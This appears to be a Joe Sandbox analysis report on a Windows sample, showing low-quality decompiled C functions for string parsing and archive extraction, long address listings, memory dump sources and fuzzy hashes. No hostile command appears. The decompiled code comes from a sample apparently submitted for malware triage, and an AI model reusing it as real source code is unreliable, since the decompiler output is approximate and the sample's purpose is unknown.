                                                                                                                                                                                                                                                        				if (_t207 - _v84 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if ((_t207 & 0x0000ffff) - _v80 - 9 > 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				goto 0xe5ac0825;
                                                                                                                                                                                                                                                        				if (_t207 - _v76 >= 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if ((_t207 & 0x0000ffff) - r12d != 0xffffffff) goto 0xe5ac085e;
                                                                                                                                                                                                                                                        				_t240 = _t207 & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t240 - 0x41 < 0) goto 0xe5ac0837;
                                                                                                                                                                                                                                                        				if (_t240 - 0x5a <= 0) goto 0xe5ac0842;
                                                                                                                                                                                                                                                        				if (_t240 - r11d < 0) goto 0xe5ac085b;
                                                                                                                                                                                                                                                        				if (_t207 - 0x7a > 0) goto 0xe5ac085b;
                                                                                                                                                                                                                                                        				if ((_t207 & 0x0000ffff) - r11w - _v72 > 0) goto 0xe5ac0856;
                                                                                                                                                                                                                                                        				goto 0xe5ac085e;
                                                                                                                                                                                                                                                        				_t405 =  *_t397;
                                                                                                                                                                                                                                                        				if ((_t240 + 0x1ffffffa9 | 0xffffffff) - r15d >= 0) goto 0xe5ac089e;
                                                                                                                                                                                                                                                        				_t208 =  *_t405 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t259 = _t381 + _t390;
                                                                                                                                                                                                                                                        				r14d = _t259;
                                                                                                                                                                                                                                                        				_t117 =  &(_t405[1]); // 0x12
                                                                                                                                                                                                                                                        				 *_t397 = _t117;
                                                                                                                                                                                                                                                        				_t263 = ( !=  ? _t144 : _t144 | 0x00000002) | (r10d & 0xffffff00 | _t259 - r14d * r15d > 0x00000000 | r10d & 0xffffff00 | r14d - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                                                                                                                                                                                                        				goto 0xe5ac067b;
                                                                                                                                                                                                                                                        				_t409 = _v64;
                                                                                                                                                                                                                                                        				_t119 = _t405 - 2; // 0xe
                                                                                                                                                                                                                                                        				_t383 = _t119;
                                                                                                                                                                                                                                                        				_t410 = _a8;
                                                                                                                                                                                                                                                        				 *_t397 = _t383;
                                                                                                                                                                                                                                                        				if (_t208 == 0) goto 0xe5ac08d4;
                                                                                                                                                                                                                                                        				if ( *_t383 == _t208) goto 0xe5ac08d4;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t383);
                                                                                                                                                                                                                                                        				 *_t383 = 0x16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				if ((sil & 0x00000008) != 0) goto 0xe5ac08f0;
                                                                                                                                                                                                                                                        				_t384 = _t397[1];
                                                                                                                                                                                                                                                        				 *_t397 = _t409;
                                                                                                                                                                                                                                                        				if (_t384 == 0) goto 0xe5ac08e9;
                                                                                                                                                                                                                                                        				 *_t384 = _t409;
                                                                                                                                                                                                                                                        				goto 0xe5ac0982;
                                                                                                                                                                                                                                                        				r8d = 0x80000000;
                                                                                                                                                                                                                                                        				_t124 = _t405 - 1; // 0xf
                                                                                                                                                                                                                                                        				r9d = _t124;
                                                                                                                                                                                                                                                        				if ((sil & 0x00000004) == 0) goto 0xe5ac0909;
                                                                                                                                                                                                                                                        				goto 0xe5ac0927;
                                                                                                                                                                                                                                                        				if ((sil & 0x00000001) == 0) goto 0xe5ac0968;
                                                                                                                                                                                                                                                        				if ((bpl & sil) == 0) goto 0xe5ac091b;
                                                                                                                                                                                                                                                        				if (r14d - r8d <= 0) goto 0xe5ac096d;
                                                                                                                                                                                                                                                        				goto 0xe5ac0920;
                                                                                                                                                                                                                                                        				if (r14d - r9d <= 0) goto 0xe5ac0970;
                                                                                                                                                                                                                                                        				 *((char*)(_t410 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t410 + 0x2c)) = 0x22;
                                                                                                                                                                                                                                                        				if ((_t263 & 0x00000001) != 0) goto 0xe5ac0940;
                                                                                                                                                                                                                                                        				r14d = r14d | 0xffffffff;
                                                                                                                                                                                                                                                        				goto 0xe5ac0970;
                                                                                                                                                                                                                                                        				_t395 = _t397[1];
                                                                                                                                                                                                                                                        				if ((0x00000002 & _t263) == 0) goto 0xe5ac0958;
                                                                                                                                                                                                                                                        				if (_t395 == 0) goto 0xe5ac0953;
                                                                                                                                                                                                                                                        				 *_t395 =  *_t397;
                                                                                                                                                                                                                                                        				goto 0xe5ac0982;
                                                                                                                                                                                                                                                        				if (_t395 == 0) goto 0xe5ac0963;
                                                                                                                                                                                                                                                        				 *_t395 =  *_t397;
                                                                                                                                                                                                                                                        				goto 0xe5ac0982;
                                                                                                                                                                                                                                                        				if ((bpl & sil) == 0) goto 0xe5ac0970;
                                                                                                                                                                                                                                                        				r14d =  ~r14d;
                                                                                                                                                                                                                                                        				_t396 = _t397[1];
                                                                                                                                                                                                                                                        				if (_t396 == 0) goto 0xe5ac097f;
                                                                                                                                                                                                                                                        				 *_t396 =  *_t397;
                                                                                                                                                                                                                                                        				return r14d;
                                                                                                                                                                                                                                                        			}
































































                                                                                                                                                                                                                                                        0x7ff6e5ac0228
                                                                                                                                                                                                                                                        0x7ff6e5ac0228
                                                                                                                                                                                                                                                        0x7ff6e5ac0228
                                                                                                                                                                                                                                                        0x7ff6e5ac0228
                                                                                                                                                                                                                                                        0x7ff6e5ac0228
                                                                                                                                                                                                                                                        0x7ff6e5ac022d
                                                                                                                                                                                                                                                        0x7ff6e5ac0244
                                                                                                                                                                                                                                                        0x7ff6e5ac0247
                                                                                                                                                                                                                                                        0x7ff6e5ac024a
                                                                                                                                                                                                                                                        0x7ff6e5ac0252
                                                                                                                                                                                                                                                        0x7ff6e5ac0255
                                                                                                                                                                                                                                                        0x7ff6e5ac025b
                                                                                                                                                                                                                                                        0x7ff6e5ac025d
                                                                                                                                                                                                                                                        0x7ff6e5ac0262
                                                                                                                                                                                                                                                        0x7ff6e5ac0268
                                                                                                                                                                                                                                                        0x7ff6e5ac026d
                                                                                                                                                                                                                                                        0x7ff6e5ac0272
                                                                                                                                                                                                                                                        0x7ff6e5ac0274
                                                                                                                                                                                                                                                        0x7ff6e5ac027b
                                                                                                                                                                                                                                                        0x7ff6e5ac027d
                                                                                                                                                                                                                                                        0x7ff6e5ac0282
                                                                                                                                                                                                                                                        0x7ff6e5ac0285
                                                                                                                                                                                                                                                        0x7ff6e5ac0289
                                                                                                                                                                                                                                                        0x7ff6e5ac028c
                                                                                                                                                                                                                                                        0x7ff6e5ac0297
                                                                                                                                                                                                                                                        0x7ff6e5ac029c
                                                                                                                                                                                                                                                        0x7ff6e5ac02a1
                                                                                                                                                                                                                                                        0x7ff6e5ac02a8
                                                                                                                                                                                                                                                        0x7ff6e5ac02b1
                                                                                                                                                                                                                                                        0x7ff6e5ac02b4
                                                                                                                                                                                                                                                        0x7ff6e5ac02be
                                                                                                                                                                                                                                                        0x7ff6e5ac02be
                                                                                                                                                                                                                                                        0x7ff6e5ac02c3
                                                                                                                                                                                                                                                        0x7ff6e5ac02c7
                                                                                                                                                                                                                                                        0x7ff6e5ac02cc
                                                                                                                                                                                                                                                        0x7ff6e5ac02db
                                                                                                                                                                                                                                                        0x7ff6e5ac02e4
                                                                                                                                                                                                                                                        0x7ff6e5ac02e6
                                                                                                                                                                                                                                                        0x7ff6e5ac02e9
                                                                                                                                                                                                                                                        0x7ff6e5ac02e9
                                                                                                                                                                                                                                                        0x7ff6e5ac02ed
                                                                                                                                                                                                                                                        0x7ff6e5ac02f0
                                                                                                                                                                                                                                                        0x7ff6e5ac0300
                                                                                                                                                                                                                                                        0x7ff6e5ac030d
                                                                                                                                                                                                                                                        0x7ff6e5ac031a
                                                                                                                                                                                                                                                        0x7ff6e5ac0322
                                                                                                                                                                                                                                                        0x7ff6e5ac0328
                                                                                                                                                                                                                                                        0x7ff6e5ac0330
                                                                                                                                                                                                                                                        0x7ff6e5ac0330
                                                                                                                                                                                                                                                        0x7ff6e5ac0334
                                                                                                                                                                                                                                                        0x7ff6e5ac033c
                                                                                                                                                                                                                                                        0x7ff6e5ac0342
                                                                                                                                                                                                                                                        0x7ff6e5ac034a
                                                                                                                                                                                                                                                        0x7ff6e5ac0352
                                                                                                                                                                                                                                                        0x7ff6e5ac035a
                                                                                                                                                                                                                                                        0x7ff6e5ac0362
                                                                                                                                                                                                                                                        0x7ff6e5ac036a
                                                                                                                                                                                                                                                        0x7ff6e5ac0372
                                                                                                                                                                                                                                                        0x7ff6e5ac037a
                                                                                                                                                                                                                                                        0x7ff6e5ac0382
                                                                                                                                                                                                                                                        0x7ff6e5ac038a
                                                                                                                                                                                                                                                        0x7ff6e5ac0392
                                                                                                                                                                                                                                                        0x7ff6e5ac039a
                                                                                                                                                                                                                                                        0x7ff6e5ac03a2
                                                                                                                                                                                                                                                        0x7ff6e5ac03aa
                                                                                                                                                                                                                                                        0x7ff6e5ac03b2
                                                                                                                                                                                                                                                        0x7ff6e5ac03ba
                                                                                                                                                                                                                                                        0x7ff6e5ac03c5
                                                                                                                                                                                                                                                        0x7ff6e5ac03d0
                                                                                                                                                                                                                                                        0x7ff6e5ac03db
                                                                                                                                                                                                                                                        0x7ff6e5ac03e6
                                                                                                                                                                                                                                                        0x7ff6e5ac03f8
                                                                                                                                                                                                                                                        0x7ff6e5ac0401
                                                                                                                                                                                                                                                        0x7ff6e5ac040b
                                                                                                                                                                                                                                                        0x7ff6e5ac0412
                                                                                                                                                                                                                                                        0x7ff6e5ac041a
                                                                                                                                                                                                                                                        0x7ff6e5ac0424
                                                                                                                                                                                                                                                        0x7ff6e5ac0432
                                                                                                                                                                                                                                                        0x7ff6e5ac043a
                                                                                                                                                                                                                                                        0x7ff6e5ac0443
                                                                                                                                                                                                                                                        0x7ff6e5ac0451
                                                                                                                                                                                                                                                        0x7ff6e5ac0459
                                                                                                                                                                                                                                                        0x7ff6e5ac0462
                                                                                                                                                                                                                                                        0x7ff6e5ac0470
                                                                                                                                                                                                                                                        0x7ff6e5ac0478
                                                                                                                                                                                                                                                        0x7ff6e5ac0480
                                                                                                                                                                                                                                                        0x7ff6e5ac048e
                                                                                                                                                                                                                                                        0x7ff6e5ac0498
                                                                                                                                                                                                                                                        0x7ff6e5ac04a4
                                                                                                                                                                                                                                                        0x7ff6e5ac04af
                                                                                                                                                                                                                                                        0x7ff6e5ac04b5
                                                                                                                                                                                                                                                        0x7ff6e5ac04bc
                                                                                                                                                                                                                                                        0x7ff6e5ac04c7
                                                                                                                                                                                                                                                        0x7ff6e5ac04d4
                                                                                                                                                                                                                                                        0x7ff6e5ac04df
                                                                                                                                                                                                                                                        0x7ff6e5ac04ec
                                                                                                                                                                                                                                                        0x7ff6e5ac04f7
                                                                                                                                                                                                                                                        0x7ff6e5ac0504
                                                                                                                                                                                                                                                        0x7ff6e5ac050f
                                                                                                                                                                                                                                                        0x7ff6e5ac051c
                                                                                                                                                                                                                                                        0x7ff6e5ac0527
                                                                                                                                                                                                                                                        0x7ff6e5ac0534
                                                                                                                                                                                                                                                        0x7ff6e5ac053f
                                                                                                                                                                                                                                                        0x7ff6e5ac054c
                                                                                                                                                                                                                                                        0x7ff6e5ac0553
                                                                                                                                                                                                                                                        0x7ff6e5ac0560
                                                                                                                                                                                                                                                        0x7ff6e5ac0567
                                                                                                                                                                                                                                                        0x7ff6e5ac0574
                                                                                                                                                                                                                                                        0x7ff6e5ac057b
                                                                                                                                                                                                                                                        0x7ff6e5ac058b
                                                                                                                                                                                                                                                        0x7ff6e5ac0595
                                                                                                                                                                                                                                                        0x7ff6e5ac05ac
                                                                                                                                                                                                                                                        0x7ff6e5ac05ae
                                                                                                                                                                                                                                                        0x7ff6e5ac05bb
                                                                                                                                                                                                                                                        0x7ff6e5ac05c5
                                                                                                                                                                                                                                                        0x7ff6e5ac05c7
                                                                                                                                                                                                                                                        0x7ff6e5ac05d1
                                                                                                                                                                                                                                                        0x7ff6e5ac05d6
                                                                                                                                                                                                                                                        0x7ff6e5ac05d6
                                                                                                                                                                                                                                                        0x7ff6e5ac05d9
                                                                                                                                                                                                                                                        0x7ff6e5ac05dd
                                                                                                                                                                                                                                                        0x7ff6e5ac05e1
                                                                                                                                                                                                                                                        0x7ff6e5ac05e6
                                                                                                                                                                                                                                                        0x7ff6e5ac05eb
                                                                                                                                                                                                                                                        0x7ff6e5ac05ed
                                                                                                                                                                                                                                                        0x7ff6e5ac05f0
                                                                                                                                                                                                                                                        0x7ff6e5ac05f6
                                                                                                                                                                                                                                                        0x7ff6e5ac05f9
                                                                                                                                                                                                                                                        0x7ff6e5ac05f9
                                                                                                                                                                                                                                                        0x7ff6e5ac05fd
                                                                                                                                                                                                                                                        0x7ff6e5ac0600
                                                                                                                                                                                                                                                        0x7ff6e5ac0607
                                                                                                                                                                                                                                                        0x7ff6e5ac060c
                                                                                                                                                                                                                                                        0x7ff6e5ac0614
                                                                                                                                                                                                                                                        0x7ff6e5ac0618
                                                                                                                                                                                                                                                        0x7ff6e5ac061e
                                                                                                                                                                                                                                                        0x7ff6e5ac0623
                                                                                                                                                                                                                                                        0x7ff6e5ac0625
                                                                                                                                                                                                                                                        0x7ff6e5ac062a
                                                                                                                                                                                                                                                        0x7ff6e5ac0630
                                                                                                                                                                                                                                                        0x7ff6e5ac0635
                                                                                                                                                                                                                                                        0x7ff6e5ac0638
                                                                                                                                                                                                                                                        0x7ff6e5ac063a
                                                                                                                                                                                                                                                        0x7ff6e5ac063e
                                                                                                                                                                                                                                                        0x7ff6e5ac063e
                                                                                                                                                                                                                                                        0x7ff6e5ac0642
                                                                                                                                                                                                                                                        0x7ff6e5ac064a
                                                                                                                                                                                                                                                        0x7ff6e5ac0654
                                                                                                                                                                                                                                                        0x7ff6e5ac0658
                                                                                                                                                                                                                                                        0x7ff6e5ac065d
                                                                                                                                                                                                                                                        0x7ff6e5ac0660
                                                                                                                                                                                                                                                        0x7ff6e5ac0660
                                                                                                                                                                                                                                                        0x7ff6e5ac0663
                                                                                                                                                                                                                                                        0x7ff6e5ac066e
                                                                                                                                                                                                                                                        0x7ff6e5ac0671
                                                                                                                                                                                                                                                        0x7ff6e5ac0677
                                                                                                                                                                                                                                                        0x7ff6e5ac0677
                                                                                                                                                                                                                                                        0x7ff6e5ac067f
                                                                                                                                                                                                                                                        0x7ff6e5ac0689
                                                                                                                                                                                                                                                        0x7ff6e5ac0691
                                                                                                                                                                                                                                                        0x7ff6e5ac069a
                                                                                                                                                                                                                                                        0x7ff6e5ac06a3
                                                                                                                                                                                                                                                        0x7ff6e5ac06b1
                                                                                                                                                                                                                                                        0x7ff6e5ac06b8
                                                                                                                                                                                                                                                        0x7ff6e5ac06c5
                                                                                                                                                                                                                                                        0x7ff6e5ac06cb
                                                                                                                                                                                                                                                        0x7ff6e5ac06d1
                                                                                                                                                                                                                                                        0x7ff6e5ac06d8
                                                                                                                                                                                                                                                        0x7ff6e5ac06e5
                                                                                                                                                                                                                                                        0x7ff6e5ac06eb
                                                                                                                                                                                                                                                        0x7ff6e5ac06f1
                                                                                                                                                                                                                                                        0x7ff6e5ac06f3
                                                                                                                                                                                                                                                        0x7ff6e5ac06f9
                                                                                                                                                                                                                                                        0x7ff6e5ac0707
                                                                                                                                                                                                                                                        0x7ff6e5ac0710
                                                                                                                                                                                                                                                        0x7ff6e5ac071b
                                                                                                                                                                                                                                                        0x7ff6e5ac0724
                                                                                                                                                                                                                                                        0x7ff6e5ac072f
                                                                                                                                                                                                                                                        0x7ff6e5ac0738
                                                                                                                                                                                                                                                        0x7ff6e5ac0743
                                                                                                                                                                                                                                                        0x7ff6e5ac074c
                                                                                                                                                                                                                                                        0x7ff6e5ac0757
                                                                                                                                                                                                                                                        0x7ff6e5ac0764
                                                                                                                                                                                                                                                        0x7ff6e5ac076f
                                                                                                                                                                                                                                                        0x7ff6e5ac077c
                                                                                                                                                                                                                                                        0x7ff6e5ac0787
                                                                                                                                                                                                                                                        0x7ff6e5ac0794
                                                                                                                                                                                                                                                        0x7ff6e5ac079f
                                                                                                                                                                                                                                                        0x7ff6e5ac07ac
                                                                                                                                                                                                                                                        0x7ff6e5ac07b3
                                                                                                                                                                                                                                                        0x7ff6e5ac07c0
                                                                                                                                                                                                                                                        0x7ff6e5ac07c7
                                                                                                                                                                                                                                                        0x7ff6e5ac07d4
                                                                                                                                                                                                                                                        0x7ff6e5ac07db
                                                                                                                                                                                                                                                        0x7ff6e5ac07eb
                                                                                                                                                                                                                                                        0x7ff6e5ac07f5
                                                                                                                                                                                                                                                        0x7ff6e5ac080c
                                                                                                                                                                                                                                                        0x7ff6e5ac0813
                                                                                                                                                                                                                                                        0x7ff6e5ac081d
                                                                                                                                                                                                                                                        0x7ff6e5ac0828
                                                                                                                                                                                                                                                        0x7ff6e5ac082a
                                                                                                                                                                                                                                                        0x7ff6e5ac0830
                                                                                                                                                                                                                                                        0x7ff6e5ac0835
                                                                                                                                                                                                                                                        0x7ff6e5ac083a
                                                                                                                                                                                                                                                        0x7ff6e5ac0840
                                                                                                                                                                                                                                                        0x7ff6e5ac0851
                                                                                                                                                                                                                                                        0x7ff6e5ac0859
                                                                                                                                                                                                                                                        0x7ff6e5ac085e
                                                                                                                                                                                                                                                        0x7ff6e5ac0864
                                                                                                                                                                                                                                                        0x7ff6e5ac0866
                                                                                                                                                                                                                                                        0x7ff6e5ac0871
                                                                                                                                                                                                                                                        0x7ff6e5ac0882
                                                                                                                                                                                                                                                        0x7ff6e5ac088a
                                                                                                                                                                                                                                                        0x7ff6e5ac0894
                                                                                                                                                                                                                                                        0x7ff6e5ac0897
                                                                                                                                                                                                                                                        0x7ff6e5ac0899
                                                                                                                                                                                                                                                        0x7ff6e5ac089e
                                                                                                                                                                                                                                                        0x7ff6e5ac08a6
                                                                                                                                                                                                                                                        0x7ff6e5ac08a6
                                                                                                                                                                                                                                                        0x7ff6e5ac08aa
                                                                                                                                                                                                                                                        0x7ff6e5ac08b7
                                                                                                                                                                                                                                                        0x7ff6e5ac08bd
                                                                                                                                                                                                                                                        0x7ff6e5ac08c2
                                                                                                                                                                                                                                                        0x7ff6e5ac08c4
                                                                                                                                                                                                                                                        0x7ff6e5ac08c9
                                                                                                                                                                                                                                                        0x7ff6e5ac08cf
                                                                                                                                                                                                                                                        0x7ff6e5ac08d8
                                                                                                                                                                                                                                                        0x7ff6e5ac08da
                                                                                                                                                                                                                                                        0x7ff6e5ac08de
                                                                                                                                                                                                                                                        0x7ff6e5ac08e4
                                                                                                                                                                                                                                                        0x7ff6e5ac08e6
                                                                                                                                                                                                                                                        0x7ff6e5ac08eb
                                                                                                                                                                                                                                                        0x7ff6e5ac08f0
                                                                                                                                                                                                                                                        0x7ff6e5ac08f6
                                                                                                                                                                                                                                                        0x7ff6e5ac08f6
                                                                                                                                                                                                                                                        0x7ff6e5ac08fe
                                                                                                                                                                                                                                                        0x7ff6e5ac0907
                                                                                                                                                                                                                                                        0x7ff6e5ac090d
                                                                                                                                                                                                                                                        0x7ff6e5ac0912
                                                                                                                                                                                                                                                        0x7ff6e5ac0917
                                                                                                                                                                                                                                                        0x7ff6e5ac0919
                                                                                                                                                                                                                                                        0x7ff6e5ac091e
                                                                                                                                                                                                                                                        0x7ff6e5ac0929
                                                                                                                                                                                                                                                        0x7ff6e5ac092e
                                                                                                                                                                                                                                                        0x7ff6e5ac0938
                                                                                                                                                                                                                                                        0x7ff6e5ac093a
                                                                                                                                                                                                                                                        0x7ff6e5ac093e
                                                                                                                                                                                                                                                        0x7ff6e5ac0940
                                                                                                                                                                                                                                                        0x7ff6e5ac0946
                                                                                                                                                                                                                                                        0x7ff6e5ac094b
                                                                                                                                                                                                                                                        0x7ff6e5ac0950
                                                                                                                                                                                                                                                        0x7ff6e5ac0956
                                                                                                                                                                                                                                                        0x7ff6e5ac095b
                                                                                                                                                                                                                                                        0x7ff6e5ac0960
                                                                                                                                                                                                                                                        0x7ff6e5ac0966
                                                                                                                                                                                                                                                        0x7ff6e5ac096b
                                                                                                                                                                                                                                                        0x7ff6e5ac096d
                                                                                                                                                                                                                                                        0x7ff6e5ac0970
                                                                                                                                                                                                                                                        0x7ff6e5ac0977
                                                                                                                                                                                                                                                        0x7ff6e5ac097c
                                                                                                                                                                                                                                                        0x7ff6e5ac099c

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                        • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                                                                                        • Instruction ID: 269eac9ce9ed4eb078a7b3762b1eaf3b958e56eee01b71a8bb240cc8d6c74a37
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31127063F0C1478AFB209A19A06437E7691FF90B54F848035D699CE6C4DF7EED808B5A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 27%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB12B0(long long* __rcx, void* __rdx) {
                                                                                                                                                                                                                                                        				long long _t8;
                                                                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t8 =  *((intOrPtr*)(__rcx));
                                                                                                                                                                                                                                                        				_t15 = __rdx;
                                                                                                                                                                                                                                                        				if (_t8 != 0) goto 0xe5ab12f8;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB3CB0(_t8, __rcx + 0x78, "rb");
                                                                                                                                                                                                                                                        				 *__rcx = _t8;
                                                                                                                                                                                                                                                        				if (_t8 != 0) goto 0xe5ab12f8;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2770(_t8, "Failed to extract %s: failed to open archive file!\n", _t15 + 0x12, _t16, _t17);
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}







                                                                                                                                                                                                                                                        0x7ff6e5ab12b8
                                                                                                                                                                                                                                                        0x7ff6e5ab12bb
                                                                                                                                                                                                                                                        0x7ff6e5ab12c4
                                                                                                                                                                                                                                                        0x7ff6e5ab12d1
                                                                                                                                                                                                                                                        0x7ff6e5ab12d6
                                                                                                                                                                                                                                                        0x7ff6e5ab12dc
                                                                                                                                                                                                                                                        0x7ff6e5ab12e9
                                                                                                                                                                                                                                                        0x7ff6e5ab12f7

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: 67a4496cb678a38d9a65dd38f0a2ba50267e2e5d0b0452953c34539433f14ecb
                                                                                                                                                                                                                                                        • Instruction ID: 11649b60ce1c0544e657eaff42575efdcdd5cb2f168c2916eca4349e2b8cf3ed
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67a4496cb678a38d9a65dd38f0a2ba50267e2e5d0b0452953c34539433f14ecb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7941A263B0864A81EA90FB19E4603A963A1FF44F94F444432DE4DC7B59EE3EE941C74A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ABDC30(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				signed int* _t128;
                                                                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                                                                        				intOrPtr _t146;
                                                                                                                                                                                                                                                        				intOrPtr _t154;
                                                                                                                                                                                                                                                        				void* _t173;
                                                                                                                                                                                                                                                        				intOrPtr _t176;
                                                                                                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                                                                                                        				void* _t209;
                                                                                                                                                                                                                                                        				signed long long _t219;
                                                                                                                                                                                                                                                        				signed long long _t220;
                                                                                                                                                                                                                                                        				signed long long _t226;
                                                                                                                                                                                                                                                        				long long _t228;
                                                                                                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                                                                                                        				intOrPtr* _t236;
                                                                                                                                                                                                                                                        				intOrPtr* _t237;
                                                                                                                                                                                                                                                        				long long _t267;
                                                                                                                                                                                                                                                        				signed int* _t280;
                                                                                                                                                                                                                                                        				long long _t281;
                                                                                                                                                                                                                                                        				void* _t282;
                                                                                                                                                                                                                                                        				void* _t283;
                                                                                                                                                                                                                                                        				signed long long _t284;
                                                                                                                                                                                                                                                        				long long _t296;
                                                                                                                                                                                                                                                        				signed int _t307;
                                                                                                                                                                                                                                                        				unsigned long long _t313;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t180 = __esi;
                                                                                                                                                                                                                                                        				_t282 = _t283 - 0x28;
                                                                                                                                                                                                                                                        				_t284 = _t283 - 0x128;
                                                                                                                                                                                                                                                        				_t219 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t220 = _t219 ^ _t284;
                                                                                                                                                                                                                                                        				 *(_t282 + 0x10) = _t220;
                                                                                                                                                                                                                                                        				_t280 =  *((intOrPtr*)(_t282 + 0x90));
                                                                                                                                                                                                                                                        				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
                                                                                                                                                                                                                                                        				 *((long long*)(_t284 + 0x68)) = __r8;
                                                                                                                                                                                                                                                        				_t236 = __rcx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t284 + 0x78)) = __rdx;
                                                                                                                                                                                                                                                        				 *(_t282 - 0x68) = _t307;
                                                                                                                                                                                                                                                        				 *((char*)(_t284 + 0x60)) = 0;
                                                                                                                                                                                                                                                        				_t281 = __r9;
                                                                                                                                                                                                                                                        				_t128 = E00007FF67FF6E5ABEBA0(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
                                                                                                                                                                                                                                                        				r14d = _t128;
